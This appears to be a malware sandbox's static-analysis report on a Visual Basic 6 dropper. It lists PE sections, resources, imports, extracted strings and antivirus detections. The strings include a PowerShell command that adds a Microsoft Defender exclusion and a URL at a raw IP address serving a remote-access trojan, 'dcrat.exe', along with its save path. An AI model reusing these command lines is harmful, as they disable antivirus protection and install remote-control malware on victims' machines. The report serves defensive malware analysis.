Static | ZeroBOX

Name	Virtual Address	Virtual Size	Size of Raw Data	Entropy
.text	0x00001000	0x00000f18	0x00001000	4.80915104147
.data	0x00002000	0x000002d8	0x00001000	0.0
.rsrc	0x00003000	0x00000894	0x00001000	1.82654515939

Name

Virtual Address

Virtual Size

Size of Raw Data

Entropy

.text

0x00001000

0x00000f18

0x00001000

4.80915104147

.data

0x00002000

0x000002d8

0x00001000

0.0

.rsrc

0x00003000

0x00000894

0x00001000

1.82654515939

Name	Offset	Size	Language	Sub-language	File type
RT_ICON	0x00003354	0x00000128	LANG_NEUTRAL	SUBLANG_NEUTRAL	GLS_BINARY_LSB_FIRST
RT_ICON	0x00003354	0x00000128	LANG_NEUTRAL	SUBLANG_NEUTRAL	GLS_BINARY_LSB_FIRST
RT_ICON	0x00003354	0x00000128	LANG_NEUTRAL	SUBLANG_NEUTRAL	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x00003324	0x00000030	LANG_NEUTRAL	SUBLANG_NEUTRAL	data
RT_VERSION	0x00003150	0x000001d4	LANG_ENGLISH	SUBLANG_ENGLISH_US	data

Name

Offset

Size

Language

Sub-language

File type

RT_ICON

0x00003354

0x00000128

LANG_NEUTRAL

SUBLANG_NEUTRAL

GLS_BINARY_LSB_FIRST

RT_ICON

0x00003354

0x00000128

LANG_NEUTRAL

SUBLANG_NEUTRAL

GLS_BINARY_LSB_FIRST

RT_ICON

0x00003354

0x00000128

LANG_NEUTRAL

SUBLANG_NEUTRAL

GLS_BINARY_LSB_FIRST

RT_GROUP_ICON

0x00003324

0x00000030

LANG_NEUTRAL

SUBLANG_NEUTRAL

data

RT_VERSION

0x00003150

0x000001d4

LANG_ENGLISH

SUBLANG_ENGLISH_US

data

!This program cannot be run in DOS mode.

`.data

MSVBVM60.DLL

Project1

Module1

Project1

kernel32

VBA6.DLL

__vbaFreeObj

__vbaFreeStr

__vbaStrCopy

__vbaLateMemCallLd

__vbaLateMemSt

__vbaLateMemCall

__vbaObjVar

__vbaObjSetAddref

__vbaSetSystemError

__vbaFreeVar

__vbaVarDup

MSVBVM60.DLL

_CIcos

_adj_fptan

__vbaFreeVar

_adj_fdiv_m64

_adj_fprem1

__vbaSetSystemError

_adj_fdiv_m32

__vbaLateMemSt

_adj_fdiv_m16i

__vbaObjSetAddref

_adj_fdivr_m16i

_CIsin

__vbaChkstk

__vbaObjVar

DllFunctionCall

_adj_fpatan

_CIsqrt

__vbaExceptHandler

_adj_fprem

_adj_fdivr_m64

__vbaFPException

_CIlog

_adj_fdiv_m32i

_adj_fdivr_m32i

__vbaStrCopy

_adj_fdivr_m32

_adj_fdiv_r

__vbaLateMemCall

__vbaVarDup

__vbaLateMemCallLd

_CIatan

_allmul

_CItan

_CIexp

__vbaFreeStr

__vbaFreeObj

@*\AC:\Users\ivan_\Desktop\run file remote\Project1.vbp

cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Public

http://51.79.49.73/crc/dcrat.exe

C:\Users\Public\Videos\dcrat.exe

MSXML2.XMLHTTP

ADODB.Stream

responseBody

SaveToFile

VS_VERSION_INFO

VarFileInfo

Translation

StringFileInfo

040904B0

ProductName

Project1

FileVersion

ProductVersion

InternalName

OriginalFilename

dcr1.exe

Antivirus	Signature
Bkav	W32.AIDetectMalware
Lionic	Clean
tehtris	Clean
MicroWorld-eScan	Gen:Variant.Tedy.380556
ClamAV	Clean
CMC	Clean
CAT-QuickHeal	Clean
McAfee	Clean
Malwarebytes	RiskWare.Agent.VB
VIPRE	Gen:Variant.Tedy.380556
Sangfor	Clean
K7AntiVirus	Clean
BitDefender	Gen:Variant.Tedy.380556
K7GW	Clean
Cybereason	malicious.d6da5f
BitDefenderTheta	Clean
VirIT	Clean
Cyren	Clean
Symantec	Clean
Elastic	malicious (high confidence)
ESET-NOD32	Clean
APEX	Malicious
Paloalto	Clean
Cynet	Clean
Kaspersky	Clean
Alibaba	Clean
NANO-Antivirus	Clean
ViRobot	Clean
Rising	Clean
TACHYON	Clean
Sophos	Clean
Baidu	Clean
F-Secure	Clean
DrWeb	Clean
Zillya	Clean
TrendMicro	Clean
McAfee-GW-Edition	Clean
Trapmine	malicious.moderate.ml.score
FireEye	Generic.mg.6ff799ae9a28bb58
Emsisoft	Gen:Variant.Tedy.380556 (B)
Ikarus	Clean
GData	Gen:Variant.Tedy.380556
Jiangmin	Clean
Webroot	Clean
Avira	Clean
Antiy-AVL	Clean
Gridinsoft	Clean
Xcitium	Clean
Arcabit	Trojan.Tedy.D5CE8C
SUPERAntiSpyware	Clean
ZoneAlarm	Clean
Microsoft	Clean
Google	Clean
AhnLab-V3	Clean
Acronis	Clean
VBA32	Clean
ALYac	Gen:Variant.Tedy.380556
MAX	malware (ai score=85)
DeepInstinct	Clean
Cylance	Clean
Panda	Clean
Zoner	Clean
TrendMicro-HouseCall	Clean
Tencent	Clean
Yandex	Clean
SentinelOne	Clean
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	Clean
AVG	Clean
Avast	Clean
CrowdStrike	win/malicious_confidence_70% (W)

Antivirus

Signature

Bkav

W32.AIDetectMalware

Lionic

Clean

tehtris

Clean

MicroWorld-eScan

Gen:Variant.Tedy.380556

ClamAV

Clean

CMC

Clean

CAT-QuickHeal

Clean

McAfee

Clean

Malwarebytes

RiskWare.Agent.VB

VIPRE

Gen:Variant.Tedy.380556

Sangfor

Clean

K7AntiVirus

Clean

BitDefender

Gen:Variant.Tedy.380556

K7GW

Clean

Cybereason

malicious.d6da5f

BitDefenderTheta

Clean

VirIT

Clean

Cyren

Clean

Symantec

Clean

Elastic

malicious (high confidence)

ESET-NOD32

Clean

APEX

Malicious

Paloalto

Clean

Cynet

Clean

Kaspersky

Clean

Alibaba

Clean

NANO-Antivirus

Clean

ViRobot

Clean

Rising

Clean

TACHYON

Clean

Sophos

Clean

Baidu

Clean

F-Secure

Clean

DrWeb

Clean

Zillya

Clean

TrendMicro

Clean

McAfee-GW-Edition

Clean

Trapmine

malicious.moderate.ml.score

FireEye

Generic.mg.6ff799ae9a28bb58

Emsisoft

Gen:Variant.Tedy.380556 (B)

Ikarus

Clean

GData

Gen:Variant.Tedy.380556

Jiangmin

Clean

Webroot

Clean

Avira

Clean

Antiy-AVL

Clean

Gridinsoft

Clean

Xcitium

Clean

Arcabit

Trojan.Tedy.D5CE8C

SUPERAntiSpyware

Clean

ZoneAlarm

Clean

Microsoft

Clean

Google

Clean

AhnLab-V3

Clean

Acronis

Clean

VBA32

Clean

ALYac

Gen:Variant.Tedy.380556

MAX

malware (ai score=85)

DeepInstinct

Clean

Cylance

Clean

Panda

Clean

Zoner

Clean

TrendMicro-HouseCall

Clean

Tencent

Clean

Yandex

Clean

SentinelOne

Clean

MaxSecure

Trojan.Malware.300983.susgen

Fortinet

Clean

AVG

Clean

Avast

Clean

CrowdStrike

win/malicious_confidence_70% (W)

Static Analysis

PE Compile Time

PE Imphash

Sections

Resources

Imports